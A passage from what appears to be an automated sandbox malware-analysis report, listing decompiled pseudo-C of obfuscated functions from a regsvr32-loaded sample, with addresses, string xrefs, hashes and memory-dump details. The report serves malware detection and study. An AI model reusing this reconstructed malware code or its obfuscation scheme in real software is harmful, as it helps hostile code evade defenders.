				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0x000408e3;
				_v44 = 0x89b89f;
				_v44 = _v44 * 0x1b;
				_v44 = _v44 / _t205;
				_v44 = _v44 ^ 0x00329adc;
				_v40 = 0x7c911;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 | 0x9fb7bc96;
				_v40 = _v40 ^ 0x9fbb58de;
				_v32 = 0x2960c2;
				_v32 = _v32 >> 0xd;
				_t206 = 0x3b;
				_v32 = _v32 * 0x6a;
				_v32 = _v32 ^ 0x000737d7;
				_v8 = 0x50758c;
				_v8 = _v8 * 0x1a;
				_v8 = _v8 / _t206;
				_v8 = _v8 + 0xffffa1a5;
				_v8 = _v8 ^ 0x002c6c3d;
				_v72 = 0xae2241;
				_v72 = _v72 >> 6;
				_v72 = _v72 ^ 0x0004039d;
				_v28 = 0x59a91e;
				_v28 = _v28 * 0x35;
				_v28 = _v28 >> 0xe;
				_v28 = _v28 + 0x675a;
				_v28 = _v28 ^ 0x00026f30;
				_v64 = 0xf7748e;
				_v64 = _v64 * 0x37;
				_v64 = _v64 ^ 0x3526d747;
				_v20 = 0x936b67;
				_v20 = _v20 + 0xffff21a6;
				_v20 = _v20 + 0x6733;
				_v20 = _v20 >> 2;
				_v20 = _v20 ^ 0x0025db68;
				_v12 = 0x60291e;
				_v12 = _v12 + 0xffffd016;
				_v12 = _v12 << 9;
				_v12 = _v12 + 0xffff2f3b;
				_v12 = _v12 ^ 0xbff2968b;
				E040EFE2A(_v60, _v36, 0x1e,  &_v104);
				E040EFE2A(_v52, _v24, 0x208,  &_v624);
				E040EFE2A(_v16, _v44, 0x208,  &_v1144);
				E040DE204(_v40, _v32,  &_v624, _a4);
				E040DE204(_v8, _v72,  &_v1144, _a12);
				_v100 = _v48;
				_v96 =  &_v624;
				_v92 =  &_v1144;
				_v88 = _v56 | _v68 | 0x00000410;
				_t200 = E040DE4F8( &_v104, _v28, _v64, _v20, _v12);
				asm("sbb eax, eax");
				return  ~_t200 + 1;
			}

0x040e6554
0x040e6557
0x040e655a
0x040e655d
0x040e655e
0x040e655f
0x040e6564
0x040e656d
0x040e6574
0x040e657b
0x040e6582
0x040e6589
0x040e658d
0x040e6594
0x040e65a1
0x040e65a4
0x040e65a7
0x040e65ab
0x040e65b2
0x040e65b9
0x040e65c0
0x040e65c7
0x040e65ce
0x040e65d5
0x040e65dc
0x040e65e7
0x040e65ea
0x040e65f1
0x040e65f8
0x040e6606
0x040e660d
0x040e6610
0x040e6613
0x040e661a
0x040e6621
0x040e6628
0x040e662c
0x040e6630
0x040e6634
0x040e663b
0x040e6646
0x040e6650
0x040e6653
0x040e665a
0x040e6661
0x040e6665
0x040e666c
0x040e6673
0x040e667a
0x040e6682
0x040e6683
0x040e6686
0x040e668d
0x040e6698
0x040e66a0
0x040e66a3
0x040e66aa
0x040e66b1
0x040e66b8
0x040e66bc
0x040e66c3
0x040e66ce
0x040e66d1
0x040e66d5
0x040e66dc
0x040e66e3
0x040e66ee
0x040e66f4
0x040e66fb
0x040e6702
0x040e6709
0x040e6710
0x040e6714
0x040e671b
0x040e6722
0x040e6729
0x040e672d
0x040e6734
0x040e6744
0x040e675c
0x040e676f
0x040e6784
0x040e6799
0x040e67a4
0x040e67ad
0x040e67b6
0x040e67ca
0x040e67d4
0x040e67de
0x040e67e5

Strings

=l,, xrefs: 040E66AA
#V, xrefs: 040E6594

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: =l,$#V
API String ID: 0-882995766
Opcode ID: 63d82414185dada1c286f70f67569fe37ebaaf7d58e8b6f899c28194972c03bf
Instruction ID: 69b6154a6f8b0fe3b5e74aacf702ff32363668d891ec9a934c3d37b6e033175d
Opcode Fuzzy Hash: 63d82414185dada1c286f70f67569fe37ebaaf7d58e8b6f899c28194972c03bf
Instruction Fuzzy Hash: 5C81F1B1D0120DEBDF08CFA1D98A8EEBBB5FF44308F208159D515BA260D7B46A49CF94

Uniqueness

Uniqueness Score: -1.00%

Function 040E07F4, Relevance: 2.6, Strings: 2, Instructions: 113
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E040E07F4() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _t88;
				intOrPtr _t89;
				void* _t96;
				signed int _t101;
				signed int _t112;
				short* _t113;
				signed int* _t116;

				_t116 =  &_v552;
				_v548 = 0x5918d1;
				_v548 = _v548 + 0xe8d9;
				_t96 = 0x413edd5;
				_v548 = _v548 * 7;
				_v548 = _v548 | 0xf342c850;
				_v548 = _v548 ^ 0xf3753354;
				_v544 = 0x3961e1;
				_t112 = 0x6c;
				_v544 = _v544 * 0x6e;
				_v544 = _v544 * 0x7b;
				_v544 = _v544 ^ 0xd8b8e625;
				_v528 = 0xb40301;
				_v528 = _v528 ^ 0x18f013f2;
				_v528 = _v528 + 0xffff1b00;
				_v528 = _v528 ^ 0x184a596c;
				_v532 = 0x9ab5ff;
				_v532 = _v532 + 0x870f;
				_v532 = _v532 + 0xffff8f3e;
				_v532 = _v532 ^ 0x0099ca27;
				_v524 = 0x5ab638;
				_v524 = _v524 + 0xffff3304;
				_v524 = _v524 ^ 0x005bd322;
				_v536 = 0x9f91e6;
				_t113 = _v524;
				_v536 = _v536 / _t112;
				_v536 = _v536 >> 2;
				_v536 = _v536 ^ 0x000cbfb4;
				_v540 = 0xcf5411;
				_t88 = _v540 * 0x37;
				_v540 = _t88;
				_v540 = _v540 ^ 0x69295e57;
				_v540 = _v540 ^ 0x45a0f7a2;
				L1:
				while(_t96 != 0x413edd5) {
					if(_t96 == 0x66ebf40) {
						_t88 = E040F0DB1(_v548,  &_v520, __eflags, _v544, _t96, _v528);
						_t116 =  &(_t116[3]);
						_t96 = 0xe87ba20;
						continue;
					}
					if(_t96 == 0x9062539) {
						_t89 =  *0x40f6214; // 0x0
						__eflags = _t89 + 0x23c;
						return E040DE204(_v536, _v540, _t89 + 0x23c, _t113);
					}
					if(_t96 != 0xe87ba20) {
						L15:
						__eflags = _t96 - 0xf0f6a33;
						if(__eflags != 0) {
							continue;
						}
						return _t88;
					}
					_v552 = 0x64b67d;
					_t101 = 0x4d;
					_v552 = _v552 / _t101;
					_v552 = _v552 << 1;
					_v552 = _v552 + 0xa638;
					_v552 = _v552 ^ 0x000343e6;
					_t113 =  &_v520 + E040E00C5( &_v520, _v532, _v524) * 2;
					while(1) {
						_t88 =  &_v520;
						if(_t113 <= _t88) {
							break;
						}
						__eflags =  *_t113 - 0x5c;
						if( *_t113 != 0x5c) {
							L8:
							_t113 = _t113 - 2;
							__eflags = _t113;
							continue;
						}
						_t74 =  &_v552;
						 *_t74 = _v552 - 1;
						__eflags =  *_t74;
						if( *_t74 == 0) {
							__eflags = _t113;
							L12:
							_t96 = 0x9062539;
							goto L1;
						}
						goto L8;
					}
					goto L12;
				}
				_t96 = 0x66ebf40;
				goto L15;
			}

0x040e07f4
0x040e07fa
0x040e0804
0x040e080c
0x040e081a
0x040e0823
0x040e0830
0x040e083d
0x040e084c
0x040e084d
0x040e0856
0x040e085a
0x040e0862
0x040e086a
0x040e0872
0x040e087a
0x040e0882
0x040e088a
0x040e0892
0x040e089a
0x040e08a2
0x040e08aa
0x040e08b2
0x040e08ba
0x040e08c8
0x040e08cc
0x040e08d0
0x040e08d5
0x040e08dd
0x040e08e5
0x040e08ea
0x040e08ee
0x040e08f6
0x00000000
0x040e08fe
0x040e090c
0x040e0998
0x040e099d
0x040e09a0
0x00000000
0x040e09a0
0x040e0910
0x040e09b7
0x040e09c0
0x00000000
0x040e09d1
0x040e0918
0x040e09a9
0x040e09a9
0x040e09af
0x00000000
0x00000000
0x00000000
0x040e09af
0x040e091e
0x040e092e
0x040e0935
0x040e0939
0x040e093d
0x040e0945
0x040e095f
0x040e0973
0x040e0973
0x040e0979
0x00000000
0x00000000
0x040e0964
0x040e0968
0x040e0970
0x040e0970
0x040e0970
0x00000000
0x040e0970
0x040e096a
0x040e096a
0x040e096a
0x040e096e
0x040e097d
0x040e0980
0x040e0980
0x00000000
0x040e0980
0x00000000
0x040e096e
0x00000000
0x040e097b
0x040e09a7
0x00000000

Strings

a9, xrefs: 040E083D
W^)i, xrefs: 040E08EE

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: W^)i$a9
API String ID: 0-1728637351
Opcode ID: b38d7856bb37b38072a3c399cb95815071753090929cf0a87973f1cabd42cae0
Instruction ID: 39baa953541eacad1bd7f53d3775595ce36051c1f9891025cb222018a33b873f
Opcode Fuzzy Hash: b38d7856bb37b38072a3c399cb95815071753090929cf0a87973f1cabd42cae0
Instruction Fuzzy Hash: 0C4177716083128FD754CF21D58542FFBE1BBC4358F044A1EF6D966260D3B4AA598F87

Uniqueness

Uniqueness Score: -1.00%

Function 040E5333, Relevance: 2.6, Strings: 2, Instructions: 107
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E040E5333(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* _t101;
				void* _t104;
				signed int _t105;
				signed int _t106;
				void* _t108;
				void* _t116;
				void* _t117;
				signed int* _t119;

				_t108 = __ecx;
				_t119 =  &_v40;
				_v16 = 0x92c19;
				_v16 = _v16 ^ 0x628de80f;
				_v16 = _v16 << 8;
				_v16 = _v16 ^ 0x84c9db68;
				_v4 = 0x30e06a;
				_v4 = _v4 ^ 0x4daac4de;
				_v4 = _v4 ^ 0x4d95dd20;
				_v20 = 0x313cca;
				_t105 = 0xc;
				_v20 = _v20 / _t105;
				_v20 = _v20 >> 9;
				_t116 = 0;
				_v20 = _v20 ^ 0x00013d87;
				_t117 = 0xe755a9f;
				_v40 = 0xb13641;
				_t106 = 0x59;
				_v40 = _v40 / _t106;
				_v40 = _v40 << 1;
				_v40 = _v40 | 0xaf38654a;
				_v40 = _v40 ^ 0xaf356b5c;
				_v24 = 0xb3ef74;
				_v24 = _v24 ^ 0x556457b4;
				_v24 = _v24 * 0x55;
				_v24 = _v24 ^ 0x80aa83de;
				_v28 = 0x9b3a5a;
				_v28 = _v28 + 0x3060;
				_v28 = _v28 + 0xffffd119;
				_v28 = _v28 ^ 0x00918c22;
				_v32 = 0x1265dc;
				_v32 = _v32 >> 0xd;
				_v32 = _v32 | 0x6a7496c5;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0x25b994ca;
				_v36 = 0xc9b3ee;
				_v36 = _v36 >> 5;
				_v36 = _v36 + 0x1e11;
				_v36 = _v36 << 3;
				_v36 = _v36 ^ 0x0035933c;
				_v8 = 0x402308;
				_v8 = _v8 ^ 0x846a3c70;
				_v8 = _v8 << 3;
				_v8 = _v8 ^ 0x2152b8ae;
				_v12 = 0xd9cdb9;
				_v12 = _v12 * 0x16;
				_v12 = _v12 | 0x05b8ac83;
				_v12 = _v12 ^ 0x17b93340;
				do {
					while(_t117 != 0xb1e0fe5) {
						if(_t117 == 0xb7b3e2e) {
							_t116 = _t116 + E040EBE8C(_t108 + 0x18, _v32, _v36, _v8, _v12);
						} else {
							if(_t117 == 0xcf04418) {
								_t104 = E040EBE8C(_t108, _v20, _v40, _v24, _v28);
								_t119 =  &(_t119[3]);
								_t117 = 0xb7b3e2e;
								_t116 = _t116 + _t104;
								continue;
							} else {
								if(_t117 != 0xe755a9f) {
									goto L8;
								} else {
									_t117 = 0xb1e0fe5;
									continue;
								}
							}
						}
						L11:
						return _t116;
					}
					_push(_t108);
					_t101 = E040E07F0();
					_t119 =  &(_t119[1]);
					_t117 = 0xcf04418;
					_t116 = _t116 + _t101;
					L8:
				} while (_t117 != 0x795fd89);
				goto L11;
			}

0x040e5333
0x040e5333
0x040e5336
0x040e5340
0x040e5348
0x040e534d
0x040e5355
0x040e535d
0x040e5365
0x040e536d
0x040e537f
0x040e5384
0x040e538a
0x040e538f
0x040e5391
0x040e5399
0x040e539e
0x040e53af
0x040e53b7
0x040e53bb
0x040e53bf
0x040e53c7
0x040e53cf
0x040e53d7
0x040e53e4
0x040e53e8
0x040e53f0
0x040e53f8
0x040e5400
0x040e5408
0x040e5410
0x040e5418
0x040e541d
0x040e5425
0x040e542a
0x040e5432
0x040e543a
0x040e543f
0x040e5447
0x040e544c
0x040e5454
0x040e545c
0x040e5464
0x040e5469
0x040e5471
0x040e547e
0x040e5482
0x040e548a
0x040e5492
0x040e5492
0x040e5498
0x040e5509
0x040e549a
0x040e54a0
0x040e54be
0x040e54c3
0x040e54c6
0x040e54c8
0x00000000
0x040e54a2
0x040e54a8
0x00000000
0x040e54aa
0x040e54aa
0x00000000
0x040e54aa
0x040e54a8
0x040e54a0
0x040e550b
0x040e5514
0x040e5514
0x040e54d4
0x040e54d5
0x040e54da
0x040e54dd
0x040e54e2
0x040e54e4
0x040e54e4
0x00000000

Strings

j0, xrefs: 040E5355
`0, xrefs: 040E53F8

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: `0$j0
API String ID: 0-1706687062
Opcode ID: a698ae834057bf3177c30c95693b9f296898de2c2be967a0d04c9a146b8b5e9c
Instruction ID: 3b026d9273b34168a963ebd4d4b15f7686645797492afcd0f58f6f236bcc5384
Opcode Fuzzy Hash: a698ae834057bf3177c30c95693b9f296898de2c2be967a0d04c9a146b8b5e9c
Instruction Fuzzy Hash: 3F4156B24083129FC344DF22998945BBBE1BBD874CF104E2DF89566260D3709A19CF93

Uniqueness

Uniqueness Score: -1.00%

Function 040D7E79, Relevance: 2.6, Strings: 2, Instructions: 104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E040D7E79(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v304;
				char _t99;
				signed int _t101;
				void* _t105;
				signed int _t107;
				signed int _t108;
				char* _t109;
				intOrPtr* _t124;
				void* _t125;

				_t124 = __ecx;
				_v16 = 0xb54463;
				_v16 = _v16 + 0xffff3415;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 + 0xffffe11b;
				_v16 = _v16 ^ 0xfff7a701;
				_v28 = 0xd77279;
				_v28 = _v28 | 0x400730c3;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0xbb990da4;
				_v36 = 0xbcfff8;
				_v36 = _v36 >> 6;
				_v36 = _v36 ^ 0x000a6762;
				_v8 = 0xf31a9;
				_v8 = _v8 + 0xffff1e98;
				_v8 = _v8 ^ 0xb4a41066;
				_v8 = _v8 | 0xf0d45968;
				_v8 = _v8 ^ 0xf4f540ba;
				_v12 = 0xc524e1;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 >> 5;
				_t107 = 0x45;
				_v12 = _v12 / _t107;
				_v12 = _v12 ^ 0x00048931;
				_v44 = 0x28a4d;
				_v44 = _v44 + 0x8441;
				_v44 = _v44 ^ 0x00037729;
				_v20 = 0x237a7e;
				_v20 = _v20 ^ 0x3c41f8ff;
				_v20 = _v20 | 0x4ede09cf;
				_v20 = _v20 >> 6;
				_v20 = _v20 ^ 0x01f9a400;
				_v32 = 0xc1354c;
				_v32 = _v32 ^ 0xd017d736;
				_v32 = _v32 + 0xb685;
				_v32 = _v32 ^ 0xd0d9caff;
				_v24 = 0x1c6e66;
				_v24 = _v24 + 0xffff7553;
				_t108 = 0x67;
				_t109 =  &_v304;
				_v24 = _v24 / _t108;
				_v24 = _v24 ^ 0x000aa416;
				_v40 = 0xe04b7f;
				_v40 = _v40 ^ 0x3f01302b;
				_v40 = _v40 ^ 0x3feda652;
				while(1) {
					_t99 =  *_t124;
					if(_t99 == 0) {
						break;
					}
					if(_t99 == 0x2e) {
						 *_t109 = 0;
					} else {
						 *_t109 = _t99;
						_t109 = _t109 + 1;
						_t124 = _t124 + 1;
						continue;
					}
					L6:
					_t125 = E040D801A(_v16,  &_v304, _v28);
					if(_t125 != 0) {
						L8:
						_t101 = E040D3362(_t124 + 1, _v12, _v44);
						_push(_v40);
						_push(_v24);
						_push(_t101 ^ 0x31e3fec1);
						_push(_t125);
						return E040DEC31(_v20, _v32);
					}
					_t105 = E040D483C(_v36, _v8,  &_v304);
					_t125 = _t105;
					if(_t125 != 0) {
						goto L8;
					}
					return _t105;
				}
				goto L6;
			}

0x040d7e84
0x040d7e86
0x040d7e8f
0x040d7e96
0x040d7e9a
0x040d7ea1
0x040d7ea8
0x040d7eaf
0x040d7eb6
0x040d7eba
0x040d7ec1
0x040d7ec8
0x040d7ecc
0x040d7ed3
0x040d7eda
0x040d7ee1
0x040d7ee8
0x040d7eef
0x040d7ef6
0x040d7efd
0x040d7f01
0x040d7f0a
0x040d7f0f
0x040d7f14
0x040d7f1b
0x040d7f22
0x040d7f29
0x040d7f30
0x040d7f37
0x040d7f3e
0x040d7f45
0x040d7f49
0x040d7f50
0x040d7f57
0x040d7f5e
0x040d7f65
0x040d7f6c
0x040d7f73
0x040d7f7d
0x040d7f80
0x040d7f86
0x040d7f89
0x040d7f90
0x040d7f97
0x040d7f9e
0x040d7faf
0x040d7faf
0x040d7fb3
0x00000000
0x00000000
0x040d7fa9
0x040d7fb7
0x040d7fab
0x040d7fab
0x040d7fad
0x040d7fae
0x00000000
0x040d7fae
0x040d7fba
0x040d7fcb
0x040d7fd0
0x040d7feb
0x040d7ff4
0x040d7ff9
0x040d8001
0x040d800a
0x040d800b
0x00000000
0x040d8011
0x040d7fdf
0x040d7fe4
0x040d7fe9
0x00000000
0x00000000
0x040d8019
0x040d8019
0x00000000

Strings

~z#, xrefs: 040D7F30
bg, xrefs: 040D7ECC

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: bg$~z#
API String ID: 0-3633068236
Opcode ID: d27443a6954f6df962cc2ff153474a91a954d70af200d7c111dd209c5580846d
Instruction ID: bc25d262f3386fd6436c532881bb33255d5417fefff9f5ee0683a606a69c54ef
Opcode Fuzzy Hash: d27443a6954f6df962cc2ff153474a91a954d70af200d7c111dd209c5580846d
Instruction Fuzzy Hash: C2413372C0031EDBDF58CFA4C94A5EEBBB1AF55718F208199C451B6220D7B81A4ACFA1

Uniqueness

Uniqueness Score: -1.00%

Function 040E5515, Relevance: 2.6, Strings: 2, Instructions: 92COMMON

Download Yara Rule

Strings

bWr, xrefs: 040E551E
(8r, xrefs: 040E5578

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: bWr$(8r
API String ID: 0-4034592896
Opcode ID: 6bd561600b29e8d40b53efd76a24b6e4d1b51c40b914b8d5291e690eb23a4ca9
Instruction ID: 42bfb6dafd84a5bd516de75a59eee63da59018a7e95a8068c5900d26c6104fe5
Opcode Fuzzy Hash: 6bd561600b29e8d40b53efd76a24b6e4d1b51c40b914b8d5291e690eb23a4ca9
Instruction Fuzzy Hash: AC411471C00219EFCF58CFA5D94A9EEBBB5FB04304F10818AE511B6260D3B55B95CF95

Uniqueness

Uniqueness Score: -1.00%

Function 1001178A, Relevance: 1.9, APIs: 1, Instructions: 445
COMMONCrypto

Download Yara Rule

C-Code - Quality: 37%

			E1001178A(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				unsigned int _t147;
				signed int _t149;
				signed int* _t152;
				intOrPtr _t159;
				intOrPtr* _t160;
				unsigned int _t163;
				unsigned int _t166;
				signed int* _t170;
				signed int* _t173;
				unsigned int _t177;
				unsigned int _t181;
				unsigned int _t185;
				signed int _t189;
				signed int* _t194;
				signed int _t195;
				unsigned int _t196;
				intOrPtr* _t197;
				unsigned int _t198;
				signed int _t213;
				signed int _t217;
				unsigned int _t224;
				void* _t225;

				_t200 = __ecx;
				_push(0x70);
				E10017BC1(E100286B6, __ebx, __edi, __esi);
				_t222 = __ecx;
				 *((intOrPtr*)(_t225 - 0x10)) = 0;
				 *((intOrPtr*)(_t225 - 0x14)) = 0x7fffffff;
				_t189 =  *(_t225 + 8);
				 *(_t225 - 4) = 0;
				if(_t189 != 0x111) {
					__eflags = _t189 - 0x4e;
					if(_t189 != 0x4e) {
						__eflags = _t189 - 6;
						_t224 =  *(_t225 + 0x10);
						if(_t189 == 6) {
							E10011159(_t200, _t222,  *((intOrPtr*)(_t225 + 0xc)), E1000FB5C(_t189, __ecx, _t225, _t224));
						}
						__eflags = _t189 - 0x20;
						if(_t189 != 0x20) {
							L12:
							_t147 =  *(_t222 + 0x4c);
							__eflags = _t147;
							if(_t147 == 0) {
								L20:
								_t149 =  *((intOrPtr*)( *_t222 + 0x28))();
								 *(_t225 + 0x10) = _t149;
								E1000E7D9(_t225 - 0x14, _t222, 7);
								_t194 = 0x10058f50 + ((_t149 ^  *(_t225 + 8)) & 0x000001ff) * 0xc;
								__eflags =  *(_t225 + 8) -  *_t194;
								 *(_t225 - 0x18) = _t194;
								if( *(_t225 + 8) !=  *_t194) {
									L25:
									_t152 =  *(_t225 - 0x18);
									_t195 =  *(_t225 + 0x10);
									 *_t152 =  *(_t225 + 8);
									_t152[2] = _t195;
									while(1) {
										__eflags =  *_t195;
										if( *_t195 == 0) {
											break;
										}
										__eflags =  *(_t225 + 8) - 0xc000;
										_push(0);
										_push(0);
										if( *(_t225 + 8) >= 0xc000) {
											_push(0xc000);
											_push( *((intOrPtr*)( *(_t225 + 0x10) + 4)));
											while(1) {
												_t196 = E1000E064();
												__eflags = _t196;
												if(_t196 == 0) {
													break;
												}
												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) -  *(_t225 + 8);
												if( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) ==  *(_t225 + 8)) {
													( *(_t225 - 0x18))[1] = _t196;
													E1000E808(_t225 - 0x14);
													L102:
													_t197 =  *((intOrPtr*)(_t196 + 0x14));
													L103:
													_push(_t224);
													_push( *((intOrPtr*)(_t225 + 0xc)));
													L104:
													_t159 =  *_t197();
													L105:
													 *((intOrPtr*)(_t225 - 0x10)) = _t159;
													goto L106;
												}
												_push(0);
												_push(0);
												_push(0xc000);
												_t198 = _t196 + 0x18;
												__eflags = _t198;
												_push(_t198);
											}
											_t195 =  *(_t225 + 0x10);
											L36:
											_t195 =  *_t195();
											 *(_t225 + 0x10) = _t195;
											continue;
										}
										_push( *(_t225 + 8));
										_push( *((intOrPtr*)(_t195 + 4)));
										_t166 = E1000E064();
										__eflags = _t166;
										 *(_t225 + 0x10) = _t166;
										if(_t166 == 0) {
											goto L36;
										}
										( *(_t225 - 0x18))[1] = _t166;
										E1000E808(_t225 - 0x14);
										L29:
										_t213 =  *((intOrPtr*)( *(_t225 + 0x10) + 0x10)) - 1;
										__eflags = _t213 - 0x44;
										if(__eflags > 0) {
											goto L106;
										}
										switch( *((intOrPtr*)(_t213 * 4 +  &M10011CA2))) {
											case 0:
												_push( *(__ebp + 0xc));
												_push(E100131BC(__ebx, __ecx, __edi, __esi, __eflags));
												goto L44;
											case 1:
												_push( *(__ebp + 0xc));
												goto L44;
											case 2:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												__eax = E1000FB5C(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L49;
											case 3:
												_push(__esi);
												__eax = E1000FB5C(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L42;
											case 4:
												_push(__esi);
												L44:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 5:
												__ecx = __ebp - 0x28;
												E10012DE4(__ebp - 0x28) =  *(__esi + 4);
												__ecx = __ebp - 0x7c;
												 *((char*)(__ebp - 4)) = 1;
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = E1000E822(__ecx, __eflags);
												__eax =  *__esi;
												__esi =  *(__esi + 8);
												 *((char*)(__ebp - 4)) = 2;
												 *(__ebp - 0x5c) = __eax;
												__eax = E1000FB83(__ecx, __edi, __esi, __eflags, __eax);
												__eflags = __eax;
												if(__eflags == 0) {
													__eax =  *(__edi + 0x4c);
													__eflags = __eax;
													if(__eflags != 0) {
														__ecx = __eax + 0x24;
														__eax = E10014BD1(__eax + 0x24, __edi, __esi,  *(__ebp - 0x5c));
														__eflags = __eax;
														if(__eflags != 0) {
															 *(__ebp - 0x2c) = __eax;
														}
													}
													__eax = __ebp - 0x7c;
												}
												_push(__esi);
												_push(__eax);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
												 *(__ebp - 0x5c) =  *(__ebp - 0x5c) & 0x00000000;
												__ecx = __ebp - 0x7c;
												 *(__ebp - 0x10) = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 1;
												__eax = E100102A7(__ebx, __ebp - 0x7c, __edi, __esi, __eflags);
												goto L59;
											case 6:
												__ecx = __ebp - 0x28;
												E10012DE4(__ebp - 0x28) =  *(__esi + 4);
												_push( *(__esi + 8));
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												 *((char*)(__ebp - 4)) = 3;
												__eax =  *__ebx();
												_t95 = __ebp - 0x24;
												 *_t95 =  *(__ebp - 0x24) & 0x00000000;
												__eflags =  *_t95;
												 *(__ebp - 0x10) = __ebp - 0x28;
												L59:
												__ecx = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 0;
												__eax = E1001322E(__ecx);
												goto L106;
											case 7:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = E1000FB5C(__ebx, __ecx, __ebp, __esi);
												goto L61;
											case 8:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L42;
											case 9:
												goto L103;
											case 0xa:
												_push(__esi);
												_push(E10014F27(__ebx, __ecx, __edi, __esi, __eflags));
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L61:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L49:
												_push(__eax);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 0xb:
												_push(__esi);
												goto L87;
											case 0xc:
												_push( *(__ebp + 0xc));
												goto L90;
											case 0xd:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0xe:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L81;
											case 0xf:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												goto L81;
											case 0x10:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L95;
											case 0x11:
												_push(E1000FB5C(__ebx, __ecx, __ebp, __esi));
												L87:
												_push( *(__ebp + 0xc));
												goto L88;
											case 0x12:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 0x13:
												_push(E1000FB5C(__ebx, __ecx, __ebp,  *(__ebp + 0xc)));
												_push(E1000FB5C(__ebx, __ecx, __ebp, __esi));
												__eax = 0;
												__eflags =  *((intOrPtr*)(__edi + 0x20)) - __esi;
												__eax = 0 |  *((intOrPtr*)(__edi + 0x20)) == __esi;
												goto L93;
											case 0x14:
												_push( *(__ebp + 0xc));
												__eax = E100131BC(__ebx, __ecx, __edi, __esi, __eflags);
												goto L76;
											case 0x15:
												_push( *(__ebp + 0xc));
												__eax = E10014F27(__ebx, __ecx, __edi, __esi, __eflags);
												goto L76;
											case 0x16:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
